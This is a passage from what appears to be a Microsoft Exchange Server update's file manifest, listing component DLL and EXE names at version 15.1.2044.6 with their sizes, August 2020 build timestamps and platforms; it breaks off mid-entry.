\nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2044.6| 13,192| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2044.6| 271,232| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2044.6| 22,400| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2044.6| 33,656| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2044.6| 18,304| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2044.6| 15,240| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2044.6| 27,520| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2044.6| 30,600| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2044.6| 22,400| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2044.6| 66,440| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2044.6| 29,568| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2044.6| 19,848| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2044.6| 20,352| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2044.6| 19,336| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2044.6| 34,184| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2044.6| 103,800| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2044.6| 31,624| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2044.6| 15,752| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2044.6| 20,872| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2044.6| 16,264| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2044.6| 49,032| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2044.6| 44,424| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2044.6| 38,280| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2044.6| 10,375,040| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2044.6| 29,064| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2044.6| 21,384| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2044.6| 24,456| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2044.6| 15,240| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2044.6| 21,880| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2044.6| 89,472| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2044.6| 20,864| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2044.6| 26,488| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2044.6| 21,384| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2044.6| 28,032| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2044.6| 28,544| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2044.6| 36,232| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2044.6| 16,760| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2044.6| 19,840| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2044.6| 17,280| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2044.6| 19,840| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2044.6| 57,216| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2044.6| 18,816| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2044.6| 16,256| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2044.6| 17,800| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2044.6| 52,608| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2044.6| 18,312| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2044.6| 34,176| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2044.6| 17,288| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2044.6| 18,816| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2044.6| 43,400| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2044.6| 165,256| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2044.6| 54,648| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2044.6| 9,059,200| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2044.6| 33,152| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2044.6| 124,296| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2044.6| 82,816| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2044.6| 14,216| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2044.6| 30,080| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2044.6| 661,376| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2044.6| 63,360| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2044.6| 175,488| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2044.6| 2,784,128| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2044.6| 53,120| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2044.6| 151,936| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2044.6| 966,016| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2044.6| 185,216| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2044.6| 31,616| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2044.6| 39,808| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2044.6| 105,856| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2044.6| 94,592| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2044.6| 43,392| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2044.6| 18,824| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2044.6| 172,920| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2044.6| 102,784| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2044.6| 98,680| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2044.6| 188,808| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2044.6| 43,392| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2044.6| 447,360| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2044.6| 89,992| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2044.6| 107,912| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2044.6| 374,664| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2044.6| 193,920| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2044.6| 551,808| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2044.6| 16,256| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2044.6| 15,744| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2044.6| 321,408| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2044.6| 45,448| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2044.6| 18,304| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2044.6| 12,664| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2044.6| 20,856| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2044.6| 415,104| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2044.6| 1,269,640| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2044.6| 39,296| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2044.6| 433,032| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2044.6| 4,560,264| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2044.6| 260,992| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2044.6| 33,664| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2044.6| 94,080| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2044.6| 591,224| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2044.6| 3,561,352| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2044.6| 67,968| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.management.dll| 15.1.2044.6| 16,465,272| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2044.6| 58,752| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2044.6| 23,936| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2044.6| 101,768| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2044.6| 543,624| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2044.6| 305,024| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2044.6| 131,960| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2044.6| 418,688| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2044.6| 275,840| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2044.6| 70,536| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2044.6| 7,872,904| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2044.6| 1,500,032| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2044.6| 145,288| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2044.6| 13,704| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2044.6| 71,552| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2044.6| 1,238,920| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2044.6| 1,876,360| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2044.6| 5,225,864| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2044.6| 36,224| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2044.6| 117,640| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2044.6| 207,744| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2044.6| 79,744| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2044.6| 17,280| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2044.6| 156,040| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2044.6| 65,920| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2044.6| 30,592| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2044.6| 58,248| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2044.6| 29,576| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2044.6| 175,496| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2044.6| 28,544| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2044.6| 75,136| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2044.6| 207,232| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2044.6| 440,704| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2044.6| 83,328| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2044.6| 35,200| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2044.6| 53,120| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2044.6| 96,648| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.migration.dll| 15.1.2044.6| 1,109,888| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2044.6| 14,720| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.1.2044.6| 135,560| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2044.6| 5,154,696| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2044.6| 19,840| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2044.6| 68,488| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.net.dll| 15.1.2044.6| 5,084,024| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2044.6| 265,608| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.2044.6| 37,760| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2044.6| 14,200| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.2044.6| 549,760| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2044.6| 22,904| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2044.6| 106,368| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.2044.6| 291,712| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2044.6| 17,288| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.2044.6| 277,888| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.odata.dll| 15.1.2044.6| 2,992,504| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.2044.6| 88,960| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2044.6| 101,760| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2044.6| 38,272| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2044.6| 45,448| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2044.6| 58,248| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2044.6| 147,336| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2044.6| 26,496| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2044.6| 184,192| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2044.6| 26,496| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2044.6| 38,272| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2044.6| 55,680| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.2044.6| 147,320| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2044.6| 191,872| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2044.6| 33,664| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.2044.6| 28,032| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2044.6| 32,648| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2044.6| 17,288| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2044.6| 17,288| 12-Aug-2020| 20:12| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.2044.6| 106,888| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.2044.6| 106,888| 12-Aug-2020| 20:10| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.2044.6| 24,960| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2044.6| 24,960| 12-Aug-2020| 20:10| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2044.6| 42,880| 12-Aug-2020| 20:11| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.2044.6| 264,064| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2044.6| 264,064| 12-Aug-2020| 20:10| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.2044.6| 358,272| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.2044.6| 4,167,552| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2044.6| 326,024| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2044.6| 41,352| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2044.6| 30,592| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2044.6| 135,040| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2044.6| 436,608| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2044.6| 14,208| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.2044.6| 224,128| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2044.6| 105,848| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.pst.dll| 15.1.2044.6| 168,840| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.2044.6| 168,840| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.2044.6| 259,464| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.2044.6| 72,056| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2044.6| 215,936| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.2044.6| 106,880| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2044.6| 425,864| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2044.6| 70,536| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.2044.6| 46,464| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.2044.6| 206,216| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.query.core.dll| 15.1.2044.6| 162,696| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.2044.6| 342,400| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.2044.6| 149,376| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.2044.6| 95,104| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2044.6| 127,368| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.2044.6| 63,360| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.2044.6| 36,736| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.2044.6| 9,666,952| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2044.6| 20,788,096| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2044.6| 36,728| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.2044.6| 97,664| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2044.6| 28,544| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.2044.6| 72,064| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.2044.6| 15,752| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2044.6| 13,184| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.2044.6| 59,264| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.rpc.dll| 15.1.2044.6| 1,638,272| 12-Aug-2020| 20:11| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2044.6| 207,232| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2044.6| 60,288| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2044.6| 517,512| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2044.6| 161,152| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2044.6| 721,784| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2044.6| 234,888| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.2044.6| 20,864| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.2044.6| 35,208| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.2044.6| 42,376| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.2044.6| 56,192| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.2044.6| 27,528| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.rules.common.dll| 15.1.2044.6| 130,432| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.2044.6| 14,712| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.2044.6| 20,352| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.safehtml.dll| 15.1.2044.6| 21,376| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.1.2044.6| 267,640| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.2044.6| 110,984| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.1.2044.6| 112,512| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.1.2044.6| 622,464| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.2044.6| 162,176| 